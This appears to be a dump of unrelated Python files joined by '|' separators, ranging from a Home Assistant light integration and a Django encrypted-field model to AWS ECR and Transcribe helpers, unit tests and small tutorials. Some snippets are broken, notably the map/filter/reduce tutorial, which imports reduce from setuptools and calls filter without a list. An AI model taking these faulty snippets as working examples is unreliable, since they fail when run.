''' Gets file url from a JSON file with job results from AWS Transcribe.
Downloads the file from Transcribe to local drive.'''
response = client.get_transcription_job(
TranscriptionJobName=job_name
)
dict = response['TranscriptionJob']
url= dict['Transcript']['TranscriptFileUri']
#Download file to local drive to be processed
def download(url, filetobedownloaded):
with open(filetobedownloaded, "wb") as file:
response = get(url)
file.write(response.content)
download(url,filetobedownloaded)
def get_brutus_response(brutusresponse):
''' Processes def get_response given file, returns as text
what was said in audio file that Transcribe processed. '''
with open(brutusresponse, 'r') as readfile:
data = json.load(readfile)
for item in data['results']['transcripts']:
global brutus_input
brutus_input = item['transcript']
return 'Command given: ' + brutus_input
def transcribe_brutus(job,jobname_stat,brutusresponse):
''' Recursive function that prints out get_brutus_response
for a job started when the job is completed.
Used in conjuction with def start_transcribe. '''
if str(get_job_status(jobname_stat))=='COMPLETED':
get_response(jobname_stat, brutusresponse)
print(str(get_brutus_response(brutusresponse)))
else:
time.sleep(5)
transcribe_brutus(jobname_stat)
|
from grizzly.dataframes.frame import Table
from grizzly.generator import GrizzlyGenerator
def use(backend):
GrizzlyGenerator._backend = backend
def close():
GrizzlyGenerator.close()
def read_table(tableName):
return Table(tableName) |
from django.db import models
import pgcrypto
class Employee(models.Model):
name = models.CharField(max_length=200)
age = pgcrypto.EncryptedIntegerField(default=42)
ssn = pgcrypto.EncryptedCharField("SSN", versioned=True, blank=True)
salary = pgcrypto.EncryptedDecimalField()
date_hired = pgcrypto.EncryptedDateField(cipher="bf", key="datekey", auto_now_add=True)
email = pgcrypto.EncryptedEmailField(unique=True, null=True)
date_modified = pgcrypto.EncryptedDateTimeField(auto_now=True)
def __str__(self):
return self.name
@property
def raw(self):
return RawEmployee.objects.get(pk=self.pk)
class RawEmployee(models.Model):
name = models.CharField(max_length=200)
age = models.TextField()
ssn = models.TextField()
salary = models.TextField()
date_hired = models.TextField()
email = models.TextField(null=True)
date_modified = models.TextField()
class Meta:
db_table = "testapp_employee"
managed = False
|
"""The Legrand RFLC integration light platform."""
from collections.abc import Mapping
from typing import Final
from homeassistant import config_entries
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_TRANSITION,
COLOR_MODE_BRIGHTNESS,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from .const import DOMAIN
class _Switch(LightEntity):
_attr_should_poll = False
def __init__(self, hub, zid: int, properties: Mapping):
self._hub = hub
self._attr_name = properties[hub.NAME]
self._attr_is_on = properties[hub.POWER]
self._device_type = properties[hub.DEVICE_TYPE]
self._zid = zid
hub.on(
f"{hub.EVENT_ZONE_PROPERTIES_CHANGED}:{zid}",
self._zone_properties_changed,
)
hub.on(hub.EVENT_CONNECTED, self._available)
hub.on(hub.EVENT_DISCONNECTED, self._available)
hub.on(hub.EVENT_AUTHENTICATED, self._available)
hub.on(hub.EVENT_UNAUTHENTICATED, self._available)
@property
def unique_id(self) -> str:
return f"{self._hub.host()}:{self._zid}"
@property
def available(self) -> bool:
return self._hub.connected and self._hub.authenticated
@property
def device_info(self) -> DeviceInfo:
return DeviceInfo(
identifiers={(DOMAIN, self.unique_id)},
manufacturer="Legrand",
model="LC7001",
name=f"{self._attr_name} {self._device_type}",
via_device=(DOMAIN,self._hub.host()),
)
async def _available(self) -> None:
self.async_write_ha_state()
def _zone_properties_changed_switch(self, message: Mapping) -> None:
hub = self._hub
if hub.PROPERTY_LIST in message:
properties = message[hub.PROPERTY_LIST]
if hub.POWER in properties:
self._attr_is_on = properties[hub.POWER]
async def _zone_properties_changed(self, message: Mapping) -> None:
self._zone_properties_changed_switch(message)
self.async_write_ha_state()
async def _async_switch(self, power: bool) -> None:
hub = self._hub
async def handle(message: Mapping):
hub.StatusError(message).raise_if()
await hub.handle_send(
handle, hub.compose_set_zone_properties(self._zid, power=power)
)
async def async_turn_on(self, **kwargs) -> None:
await self._async_switch(True)
async def async_turn_off(self, **kwargs) -> None:
await self._async_switch(False)
class _Dimmer(_Switch):
_attr_color_mode = COLOR_MODE_BRIGHTNESS
_attr_supported_color_modes = {COLOR_MODE_BRIGHTNESS}
_attr_supported_features = SUPPORT_TRANSITION
@staticmethod
def _normalize(value: int, ceiling: int) -> float:
"""Normalize [0, ceiling] to [0.0, 1.0]."""
return value / ceiling
@staticmethod
def _quantize(value: float, ceiling: int) -> int:
"""Quantize [0.0, 1.0] to [0, ceiling]."""
return int(value * ceiling)
# dimming ceilings for homeassistant and us (LC7001)
HA: Final[int] = 255
US: Final[int] = 100
@staticmethod
def _to_ha(value: int) -> int:
return _Dimmer._quantize(_Dimmer._normalize(value, _Dimmer.US), _Dimmer.HA)
@staticmethod
def _from_ha(value) -> int:
return _Dimmer._quantize(_Dimmer._normalize(value, _Dimmer.HA), _Dimmer.US)
def __init__(self, hub, zid: int, properties: Mapping):
super().__init__(hub, zid, properties)
self._attr_brightness = self._to_ha(properties[hub.POWER_LEVEL])
async def _zone_properties_changed(self, message: Mapping) -> None:
self._zone_properties_changed_switch(message)
hub = self._hub
if hub.PROPERTY_LIST in message:
properties = message[hub.PROPERTY_LIST]
if hub.POWER_LEVEL in properties:
self._attr_brightness = self._to_ha(properties[hub.POWER_LEVEL])
self.async_write_ha_state()
async def _async_dimmer(self, power: bool, **kwargs) -> None:
hub = self._hub
async def handle(message: Mapping) -> None:
hub.StatusError(message).raise_if()
properties: dict = {"power": power}
if ATTR_BRIGHTNESS in kwargs:
brightness = self._from_ha(kwargs[ATTR_BRIGHTNESS])
properties["power_level"] = brightness
else:
if power:
brightness = self._from_ha(self.brightness)
else:
brightness = 0
if ATTR_TRANSITION in kwargs:
change = abs(brightness - self._from_ha(self.brightness))
properties["ramp_rate"] = min(
max(int(change / kwargs[ATTR_TRANSITION]), 1), 100
)
await hub.handle_send(
handle,
hub.compose_set_zone_properties(self._zid, **properties),
)
async def async_turn_on(self, **kwargs) -> None:
await self._async_dimmer(True, **kwargs)
async def async_turn_off(self, **kwargs) -> None:
await self._async_dimmer(False, **kwargs)
async def async_setup_entry(
hass: HomeAssistant,
entry: config_entries.ConfigEntry,
async_add_entities,
) -> None:
"""Set up the Legrand RFLC integration light platform.
Adds a Dimmer or Switch for each like zone on this entry's hub.
"""
hub = hass.data[DOMAIN][entry.entry_id]
async def zones(message: Mapping) -> None:
async def zone(message: Mapping) -> None:
zid = message[hub.ZID]
properties = message[hub.PROPERTY_LIST]
device_type = properties[hub.DEVICE_TYPE]
if device_type == hub.DIMMER:
async_add_entities([_Dimmer(hub, zid, properties)], False)
elif device_type == hub.SWITCH:
async_add_entities([_Switch(hub, zid, properties)], False)
hub.StatusError(message).raise_if()
for item in message[hub.ZONE_LIST]:
await hub.handle_send(
zone, hub.compose_report_zone_properties(item[hub.ZID])
)
await hub.handle_send(zones, hub.compose_list_zones())
|
import setuptools
import warnings
DISTNAME = "scipydirect"
DESCRIPTION = "Python wrapper to the DIRECT algorithm"
LONG_DESCRIPTION ="""
DIRECT is a method to solve global bound constraint optimization problems and
was originally developed by D. R. Jones, C. D. Perttunen and B. E. Stuckmann.
The scipydirect is a fork of pydirect providing a scipy.optimize compatible
syntax. It uses the Fortran implementation of DIRECT written by
Joerg M Gablonsky, DIRECT Version 2.0.4.
For more info see the `documentation <http://scipydirect.readthedocs.io/en/latest/>`_ or the `source code <http://github.com/andim/scipydirect>`_.
"""
MAINTAINER = "Andreas Mayer"
MAINTAINER_EMAIL = "[email protected]"
URL = "http://github.com/andim/scipydirect"
LICENSE = "MIT"
VERSION = "1.3"
classifiers = ['Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
'License :: OSI Approved :: MIT License',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Operating System :: OS Independent']
def configuration(parent_package='', top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(DISTNAME, parent_package, top_path,
version=VERSION,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION)
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
kwargs = dict(
packages=setuptools.find_packages(),
include_package_data=True,
platforms=["any"],
requires=["numpy"],
install_requires=["numpy"],
tests_require=['nose',],
test_suite='nose.collector',
zip_safe=True,
classifiers=classifiers,
)
try:
thiskwargs = kwargs.copy()
config = configuration()
config.add_extension('direct', sources=['src/direct.pyf', 'src/DIRect.f', 'src/DIRserial.f', 'src/DIRsubrout.f'])
thiskwargs.update(config.todict())
setup(**thiskwargs)
except:
# if there was an error try building module without Fortran extension
# the module will not be usable, but documentation can be built
# (for readthedocs)
warnings.warn('There was an error with building the Fortran extension.')
thiskwargs = kwargs.copy()
config = configuration()
thiskwargs.update(config.todict())
setup(**thiskwargs)
|
from __future__ import unicode_literals
from frappe import _
def get_data():
return {
'fieldname': 'fiscal_year',
'transactions': [
{
'label': _('Budgets'),
'items': ['Budget']
},
{
'label': _('References'),
'items': ['Period Closing Voucher', 'Tax Withholding Category']
},
{
'label': _('Target Details'),
'items': ['Sales Person', 'Sales Partner', 'Territory', 'Monthly Distribution']
}
]
}
|
class Handling:
"""
An object representing a request received by an endpoint and the
response it returns.
"""
def __init__(self, endpoint, request, response):
self.endpoint = endpoint
self.request = request
self.response = response
def __repr__(self):
return ('Handling(endpoint=%r, request=%r, response=%r)' %
(self.endpoint, self.request, self.response))
|
"""
How to speed up for cycle with break and continue
-------------------------------------------------
continue: Jump to the next iteration, the remain part of the actual iteration
won't be executed
break: Jump out from the for loop, the remain part of the whole for cycle
won't be executed
"""
print('This is a normal for loop')
for i in range(4):
print(i)
print('\nThis is an example for continue')
for i in range(4):
if i == 2:
continue
print(i)
print('\nThis is an example for break')
for i in range(4):
if i == 2:
break
print(i)
print('\nEnd of examples') |
import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_environment_config():
os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
config = _load_test_config('sample_config.json', True)
# Not overridden in environment
assert config.output_path == '/foo/bar'
# Overridden in environment; dict value in environment
assert config.sub_config == { "a": "override", "b": 3 }
# Only specified in environment
assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_yaml_config():
config = _load_test_config('sample_config.yaml')
check_config(config)
def test_get_with_default():
config = _load_test_config('sample_config.yaml')
assert config.get('nonexistent') is None
assert config.get('nonexistent', 'value') == 'value'
assert config.get('nonexistent', []) == []
def test_config_update():
config = _load_test_config('sample_config.yaml')
config.update(_load_test_config('update.yaml'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
|
import numpy
N,M = map(int,input().split())
array =numpy.array([input().split() for _ in range(N)],int)
print (numpy.transpose(array))
print (array.flatten()) |
import re
from regression_tests import *
class UserAndLinkedTest(Test):
"""Tests that the generated functions are recognized as "user-defined",
"statically linked", and "dynamically linked", and put into proper sections
in the generated C file.
Also, we check that a correct separation is done in the generated DSM file.
"""
settings = TestSettings(
input='wide-strings.ex'
)
def test_funcs_are_separated_in_c_into_user_defined_dynamically_linked_and_statically_linked(self):
expected_code_re = re.compile("""
-\ Functions\ -
.*
main
.*
-\ Statically\ Linked\ Functions\ -
.*
___main
.*
-\ Dynamically\ Linked\ Functions\ -
.*
_wfopen
""",
flags=re.VERBOSE | re.DOTALL
)
assert self.out_c.contains(expected_code_re)
def test_funcs_are_correctly_marked_in_dsm(self):
assert self.out_dsm.contains(r'; *function: main')
assert self.out_dsm.contains(r'; *statically linked function: ___multadd_D2A')
assert self.out_dsm.contains(r'; *statically linked function: ___main')
class UserAndSyscallTest(Test):
"""Tests that the generated functions are recognized as "user-defined" and
"syscall", an put into proper sections in the generated C file.
"""
settings = TestSettings(
input='732-sample-1991.elf'
)
def test_funcs_are_separated_in_c_into_user_defined_and_syscalls(self):
expected_code_re = re.compile("""
-\ Functions\ -
.*
entry_point
.*
-\ System-Call\ Functions\ -
.*
accept
.*
""",
flags=re.VERBOSE | re.DOTALL
)
assert self.out_c.contains(expected_code_re)
#class IdiomFromFrontendTest(Test):
#"""Tests that the generated functions are recognized "idiom" by frontend,
#an put into proper sections in the generated C file.
#"""
#settings = TestSettings(
#input='idioms.arm.gcc.O0.exe',
#)
#def test_funcs_are_separated_into_idioms(self):
#expected_code_re = re.compile("""
#-\ Instruction-Idiom\ Functions\ -
#.*
#fabsf
#.*
#""",
#flags=re.VERBOSE | re.DOTALL
#)
#assert self.out_c.contains(expected_code_re)
|
#
# Copyright (c) 2020 Yves Vogl
#
import boto3
import boto3.session
import base64
from .repository import Repository
class Registry:
def __init__(self,
registry_id,
profile_name=None,
region_name="eu-central-1",
role_arn=None,
role_session_name=None):
self._repositories = []
self._endpoint = None
self._username = None
self._password = None
session = boto3.session.Session(
region_name=region_name,
profile_name=profile_name
)
if role_arn != None:
response = session.client('sts').assume_role(
RoleArn=role_arn,
RoleSessionName=role_session_name
if role_session_name != None
else f'registry-synchronizer-{registry_id}',
)
session = boto3.session.Session(
region_name=region_name,
profile_name=profile_name,
aws_access_key_id=response['Credentials']['AccessKeyId'],
aws_secret_access_key=response['Credentials']['SecretAccessKey'],
aws_session_token=response['Credentials']['SessionToken']
)
self._registry_id = registry_id
self._client = session.client('ecr')
self.authorize()
def authorize(self):
authorization_token = self._client.get_authorization_token()['authorizationData'][0]
self._endpoint = authorization_token['proxyEndpoint']
self._username, self._password = base64.b64decode(
authorization_token['authorizationToken']
).decode().split(':')
# FIXME: This method should be mixed in as its not specfic to ECR
def includes(self, repository, ignore_namespace=False, transformation=None, repositories=None):
repository_names = self.repository_names(ignore_namespace)
for repository_name in repository_names:
a = transformation(repository.name(ignore_namespace)) if transformation != None else repository.name(
ignore_namespace)
b = repository_name
if a == b:
matched_repository = next(
(repo for repo in self.repositories if repo.name(ignore_namespace) == repository_name), None)
if matched_repository != None and repositories != None:
if matched_repository.name(ignore_namespace=True) in repositories:
return matched_repository
else:
return None
else:
return matched_repository
@property
def url(self):
return self._endpoint
@property
def name(self):
return self._endpoint.replace("https://", "")
@property
def username(self):
return self._username
@property
def password(self):
return self._password
@property
def repositories(self):
# FIXME: Make iterable
if not self._repositories:
for repo in self._client.describe_repositories(
registryId=self._registry_id,
maxResults=1000
)['repositories']:
repository = Repository(self, repo['repositoryName'])
self._repositories.append(repository)
return self._repositories
def repository_names(self, ignore_namespace=False):
return [
repository.name(ignore_namespace) for repository in self.repositories
]
@property
def client(self):
return self._client
|
import requests
import pytest
from tests.mock_responses import MockURLs, MockResponses
class TestHierarchiesApi:
def test_getHierarchies_success(self, client, requests_mock):
requests_mock.request(
"GET", MockURLs.hierarchies_url, json=MockResponses.mock_hierarchies
)
resp = client.hierarchies.getHierarchies()
assert len(resp["hierarchies"]) == 1
assert isinstance(resp["hierarchies"], list)
assert isinstance(resp["hierarchies"][0], dict)
assert resp["hierarchies"][0]["id"] == "6e292e54-9a26-4be1-9034-607d71492707"
def test_getHierarchies_raises_HTTPError(self, client, requests_mock, caplog):
requests_mock.request(
"GET", MockURLs.hierarchies_url, exc=requests.exceptions.HTTPError
)
with pytest.raises(requests.exceptions.HTTPError):
client.hierarchies.getHierarchies()
assert (
"TSIClient: The request to the TSI api returned an unsuccessfull status code."
in caplog.text
)
def test_getHierarchies_raises_ConnectTimeout(self, client, requests_mock, caplog):
requests_mock.request(
"GET", MockURLs.hierarchies_url, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(requests.exceptions.ConnectTimeout):
client.hierarchies.getHierarchies()
assert "TSIClient: The request to the TSI api timed out." in caplog.text
|
# tree to be sorted as "eert
def sort_based_on_frequency_of_occurrance(word_to_sort):
class CharToCountMap:
def __init__(self):
self.__char = None
self.__count = None
@property
def char(self):
return self.__char
@char.setter
def char(self,char):
self.__char = char;
@property
def count(self):
return self.__count
@count.setter
def count(self,count):
self.__count = count
def __eq__(self, value):
return self.__char.__eq__(value.char)
def __hash__(self):
return self.__char.__hash__()
def __repr__(self):
return "char: {}, count: {}".format(self.char,self.count)
charToCountMapSet = set()
def get_matching_element_from_list(object,a_list):
is_present = None
for element in a_list:
if type(a_list) is set:
if element == object:
is_present = element
break
else:
if element.char == object.char:
is_present = element
break
return is_present
for char in word_to_sort:
# check if word in set
# if yes
# then get "count"
# increment count
# if no
# then create charToCountMap
# add count = 1
newCharCountMap = CharToCountMap()
newCharCountMap.char = char
newCharCountMap.count = 1
element = get_matching_element_from_list(newCharCountMap,charToCountMapSet)
if element is not None:
newCharCountMap.count = element.count + 1
charToCountMapSet.remove(newCharCountMap)
charToCountMapSet.add(newCharCountMap)
def comperator(lhs,rhs):
if lhs.count >= rhs.count:
return lhs.count
else:
return rhs.count
# default sort is ascending
sortedCharToCountMapSet = sorted(
charToCountMapSet,key=lambda item: item.count, reverse=True
)
print(
sortedCharToCountMapSet
)
def replicate_string(string,times):
string_accrue = ""
for index in range(0,times):
string_accrue = string_accrue + string
return string_accrue
sortedString = ""
for charToCountMap in charToCountMapSet:
stringFromCharToCountMap = replicate_string(charToCountMap.char,charToCountMap.count)
sortedString = sortedString + stringFromCharToCountMap
print(sortedString)
# newCharCountMap = CharToCountMap()
# newCharCountMap.char = "t"
# newCharCountMap.count = 1
# newCharCountMapSingleSet = set([newCharCountMap])
# print(
# charToCountMapSet
# )
# print(
# newCharCountMap in charToCountMapSet
# )
# print(
# charToCountMapSet.intersection(
# newCharCountMapSingleSet
# )
# )
# print(
# set([newCharCountMap]).difference_update(
# newCharCountMapSingleSet
# )
# )
# print(
# newCharCountMapSingleSet.difference_update(
# set([newCharCountMap])
# )
# )
sort_based_on_frequency_of_occurrance("treee") # return eeert
sort_based_on_frequency_of_occurrance("trrrreee") # return rrrreeet
|
import unittest
from bupt_ncov_report.pure_utils import *
class Test_PureUtils(unittest.TestCase):
def setUp(self) -> None:
self.u = PureUtils()
def test_isNumberDataInRange_None(self):
self.assertFalse(self.u.is_number_data_in_range(None, (-1, 1)))
def test_isNumberDataInRange_EmptyStr(self):
self.assertFalse(self.u.is_number_data_in_range('', (-1, 1)))
def test_isNumberDataInRange_Hex_1(self):
self.assertFalse(self.u.is_number_data_in_range('0X1A', (0, 32)))
def test_isNumberDataInRange_Hex_2(self):
self.assertFalse(self.u.is_number_data_in_range('1A', (0, 32)))
def test_isNumberDataInRange_Text(self):
self.assertFalse(self.u.is_number_data_in_range('abc', (0, 32)))
def test_isNumberDataInRange_UpperBound(self):
self.assertFalse(self.u.is_number_data_in_range(100, (-82, 100)))
def test_isNumberDataInRange_NumInStr(self):
self.assertTrue(self.u.is_number_data_in_range('233', (0, 1000)))
def test_isNumberDataInRange_LowerBound(self):
self.assertTrue(self.u.is_number_data_in_range('-82', (-82, 100)))
def test_matchReGroup1_1Group(self):
with self.assertRaises(BaseException) as _ctxt:
self.u.match_re_group1(r'abc(\d+)def', 'abcdef')
self.assertEqual('1234', self.u.match_re_group1(r'abc(\d+)def', 'abc1234def'))
def test_matchReGroup1_2Group(self):
self.assertEqual('1234', self.u.match_re_group1(r'abc(\d+)(def)', 'abc1234def'))
def test_looksTruthy(self):
self.assertTrue(PureUtils.looks_truthy('Fuck You'))
self.assertTrue(PureUtils.looks_truthy('true'))
self.assertTrue(PureUtils.looks_truthy('1 '))
self.assertTrue(PureUtils.looks_truthy(1))
self.assertTrue(PureUtils.looks_truthy([[]]))
self.assertFalse(PureUtils.looks_truthy('fAlSe'))
self.assertFalse(PureUtils.looks_truthy(' 0'))
self.assertFalse(PureUtils.looks_truthy(0))
self.assertFalse(PureUtils.looks_truthy(dict()))
self.assertFalse(PureUtils.looks_truthy([0]))
self.assertFalse(PureUtils.looks_truthy(None))
def test_looksFalsy(self):
self.assertFalse(PureUtils.looks_falsy('Fuck You'))
self.assertFalse(PureUtils.looks_falsy('true'))
self.assertFalse(PureUtils.looks_falsy('1 '))
self.assertFalse(PureUtils.looks_falsy(1))
self.assertFalse(PureUtils.looks_falsy([[]]))
self.assertTrue(PureUtils.looks_falsy('fAlSe'))
self.assertTrue(PureUtils.looks_falsy(' 0'))
self.assertTrue(PureUtils.looks_falsy(0))
self.assertTrue(PureUtils.looks_falsy(dict()))
self.assertTrue(PureUtils.looks_falsy([0]))
self.assertTrue(PureUtils.looks_falsy(None))
if __name__ == '__main__':
unittest.main()
|
import unittest
import zipfile
class DatasetMergeTest(unittest.TestCase):
def test_dataset(self):
with zipfile.ZipFile('tests/dataset_merge/dataset.zip') as zf:
self.assertEqual(
sorted(zf.namelist()),
['data1.in', 'data2.in', 'data3.ans', 'data3.in'])
def test_empty(self):
with zipfile.ZipFile('tests/dataset_merge/empty.zip') as zf:
self.assertEqual(zf.namelist(), [])
if __name__ == '__main__':
unittest.main()
|
from setuptools import reduce #importing reduce module for using reduce function
l1 = [2,3,4,5,6]
mapping_the_l1 = list(map(lambda x: x*2, l1)) # MAP FUNCTION APPLIES THE GIVEN COMMAND TO EVERY INDEX OF A LIST
# IN THIS CASE WE ARE MULTIPLYING EVERY CHARACTER IF LIST l1 TO 2 USING LAMBDA FUNCTION
print(mapping_the_l1)
filtering_the_l1 = list(filter(lambda x: x%2 ==0)) #FILTER FUNCTION FILTERS THE LIST ACCORDING TO OUR WISH
# IN THIS CASE WE ARE FILERING THE NUMBER WHICH IS DIVISIBLE BY 2 IN l1.
print(filtering_the_l1)
def add(x, y):
return x+y
reducing_the_l1 = reduce(add, l1) # REDUCE FUNCTION IS USED FOR DOING MATHEMATICAL OPERATIONS IN A LIST
# HERE, WE ARE ADDING ALL THE CHARACTERS THE LIST l1
print(reducing_the_l1)
|
import numpy as _np
from scipy.io import loadmat as _loadmat
from .. import dnpData as _dnpData
def importPower(path,filename = ''):
'''
import powers file
'''
fullPath = path + filename
if fullPath[-4:] == '.mat':
rawDict = _loadmat(fullPath)
t = rawDict['timelist'].reshape(-1)
p = rawDict['powerlist'].reshape(-1)
elif fullPath[-4:] == '.csv':
raw = _np.loadtxt(fullPath,delimiter = ',',skiprows = 1)
t = raw[:,0].reshape(-1)
p = raw[:,1].reshape(-1)
else:
print('Could not identify power data type')
return
return t,p
def chopPower(t,p,threshold = 0.1):
'''
Use Derivative to chop Powers
'''
diffPower = _np.diff(p)
step = [abs(x) > threshold for x in diffPower]
correctedStep = []
for ix in range(len(step) - 1):
if step[ix] and step[ix+1]:
correctedStep.append(False)
elif step[ix] and not step[ix+1]:
correctedStep.append(True)
else:
correctedStep.append(False)
stepIndex = [0]
for ix in range(len(correctedStep)):
if correctedStep[ix]:
stepIndex.append(ix)
stepTupleList = []
for ix in range(len(stepIndex)-1):
stepTupleList.append((stepIndex[ix],stepIndex[ix+1]))
averagePowerList = []
averageTimeList = []
for stepTuple in stepTupleList:
averagePower = p[stepTuple[0]+1:stepTuple[1]]
averagePower = _np.mean(averagePower)
averagePowerList.append(averagePower)
averageTime = (t[stepTuple[0]+1] + t[stepTuple[1]]) / 2.
averageTimeList.append(averageTime)
averagePowerArray = _np.array(averagePowerList)
averageTimeArray = _np.array(averageTimeList)
return averageTimeArray, averagePowerArray
def assignPower(dataDict,expNumList,powersList):
'''
Given a dictionary of dnpData objects with key being folder string,
return the data with power values assigned to a new axis dimension
'''
doInitialize = True
for ix,expNum in enumerate(expNumList):
if str(expNum) in dataDict:
if doInitialize:
data = dataDict[str(expNum)]
data.addAxes('power',powersList[ix])
doInitialize = False
else:
tempData = dataDict[str(expNum)].copy()
tempData.addAxes('power',powersList[ix])
data.concatenateAlong(tempData,'power')
return data
if __name__ == '__main__':
from matplotlib.pylab import *
#### Set Custom Matplotlib Parameters
#matplotlib.rcParams['font.family'] = 'Myriad Pro' # font style, same as illustrator default
matplotlib.rcParams['font.size'] = 24. # font size for axis
matplotlib.rcParams['lines.linewidth'] = 1.
matplotlib.rcParams['axes.linewidth'] = 2.
matplotlib.rcParams['legend.fontsize'] = 14. # set legend font
#matplotlib.rcParams['legend.fontsize'] = 20. # set legend font
#matplotlib.rcParams['figure.subplot.bottom'] = 0.15
matplotlib.rcParams['figure.subplot.bottom'] = 0.20
matplotlib.rcParams['figure.subplot.top'] = .9
#matplotlib.rcParams['figure.subplot.left'] = .125
matplotlib.rcParams['figure.subplot.left'] = .20
matplotlib.rcParams['figure.subplot.right'] = .9
matplotlib.rcParams['xtick.major.size'] = 10 # sets tick thickness
matplotlib.rcParams['xtick.major.width'] = 2 # sets tick thickness
matplotlib.rcParams['xtick.minor.size'] = 5 # sets tick thickness
matplotlib.rcParams['xtick.minor.width'] = 1 # sets tick thickness
matplotlib.rcParams['xtick.direction'] = 'out' # sets tick thickness
matplotlib.rcParams['ytick.major.size'] = 10 # sets tick thickness
matplotlib.rcParams['ytick.major.width'] = 2 # sets tick thickness
matplotlib.rcParams['ytick.minor.size'] = 5 # sets tick thickness
matplotlib.rcParams['ytick.minor.width'] = 1 # sets tick thickness
matplotlib.rcParams['ytick.direction'] = 'out' # sets tick thickness
matplotlib.rcParams['pdf.fonttype'] = 42 # set font type so that I can edit with illustrator
path = 'G:/My Drive/Exchange/Projects/0055 CPF-NIGM-0055 ODNP System/Software/Python/data/TEMPO_and_PEG_ODNP_data/TEMPO_and_PEG_ODNP_data/20191017_TW_4OHTEMPO_1p0mM/'
filename = 'power.mat'
t,p = importPower(path,filename)
figure('raw powers')
plot(t,p,linewidth = 2.)
xlabel('Time (s)')
averageTime,averagePower = chopPower(t,p)
# figure('chopped Powers')
plot(averageTime,averagePower,'bo',markersize = 6.)
ylabel('Power (dB)')
xlabel('Index')
show()
|
from numpy import float32, vstack, ones, zeros
from cv2 import SURF, FlannBasedMatcher, cvtColor, COLOR_BGR2GRAY
def get_points(c_img1, c_img2):
# convert to gray
img1 = cvtColor(c_img1, COLOR_BGR2GRAY)
img2 = cvtColor(c_img2, COLOR_BGR2GRAY)
surf = SURF() # Initiate SURF detector
# find the key points and descriptors with SURF
kp1, des1 = surf.detectAndCompute(img1, None)
kp2, des2 = surf.detectAndCompute(img2, None)
my_flan_index_tree = 0
index_params = dict(algorithm=my_flan_index_tree, trees=6)
search_params = dict(checks=50)
my_flan = FlannBasedMatcher(index_params, search_params)
matches = my_flan.knnMatch(des1, des2, k=2)
# store all the good matches as per Lowe's ratio test.
good = []
pts2 = []
pts1 = []
for m, n in matches:
if m.distance < 0.9*n.distance:
good.append(m)
pts1 = float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
pts2 = float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
# get color of key points
lengths = len(pts1) - 1
color1 = zeros((len(pts1), 1, 3))
color2 = zeros((len(pts1), 1, 3))
color = zeros((len(pts1), 1, 3), dtype=int)
for i in range(1, lengths):
color1[i] = c_img1[int(pts1[i][0][1]), int(pts1[i][0][0])]
color2[i] = c_img2[int(pts2[i][0][1]), int(pts2[i][0][0])]
color[i] = (color1[i] + color2[i])/2 # avg of colors
# convert the 2D features into homogeneous coordinates into array of 3x51 dimension
pt1 = pts1.reshape((pts1.shape[0], 2)).T
pt1 = vstack((pt1, ones(pt1.shape[1])))
pt2 = pts2.reshape((pts2.shape[0], 2)).T
pt2 = vstack((pt2, ones(pt2.shape[1])))
return pt1, pt2, color
|
# -*- coding: utf-8 -*-
# test/unit/coro/test_maxruntime.py
# Copyright (C) 2016 authors and contributors (see AUTHORS file)
#
# This module is released under the MIT License.
"""Test maxruntime() coro func"""
# ============================================================================
# Imports
# ============================================================================
# Stdlib imports
import asyncio
from datetime import timedelta
# Third-party imports
from pandas import Timedelta
import pytest
# Local imports
from loadlimit.core import BaseLoop
from loadlimit.coro import maxruntime
# ============================================================================
# Tests
# ============================================================================
@pytest.mark.parametrize('cls', [Timedelta, timedelta])
def test_stops_event(testloop, cls):
"""Stops the event loop after the specified amount of time"""
val = 0
async def run():
"""run"""
nonlocal val
while True:
val = val + 1
await asyncio.sleep(0.1)
end = cls(seconds=1)
with BaseLoop() as main:
for coro in [maxruntime(end), run()]:
asyncio.ensure_future(coro)
main.start()
assert val >= 10
@pytest.mark.parametrize('val', [42, 4.2, '42', [42], (42, )])
@pytest.mark.asyncio
async def test_not_timedelta(val):
"""Raises error if delta arg is not a timedelta instance"""
expected = ('delta expected timedelta, got {} instead'.
format(type(val).__name__))
with pytest.raises(TypeError) as err:
await maxruntime(val)
assert err.value.args == (expected, )
# ============================================================================
#
# ============================================================================
|
#!/usr/bin/env python
import sys
import ptb, error_tree, repair_tree, bracket_errors, error_group
import s_single_word, s_unary, s_attachment
# Other ideas:
# NP internal structure:
# - a collection of extra NP brackets inside an NP, with only NPs below
# - a collection of missing NP brackets inside an NP, with only NPs below
def check_for_matching_errors(ungrouped, group, gold, test):
spans, span_set = test.get_spans()
to_remove = []
for merror in ungrouped:
if merror.missing:
span = merror.node.span
if span in span_set:
if merror.node.label in span_set[span]:
trees = span_set[span][merror.node.label]
found = False
for tree in trees:
if tree.extra:
for eerror in ungrouped:
if eerror.extra and eerror.node == tree.basis_tree:
to_remove.append(merror)
to_remove.append(eerror)
tree.extra = False
found = True
break
if found:
break
for error in to_remove:
ungrouped.remove(error)
group.errors.append(error)
return test
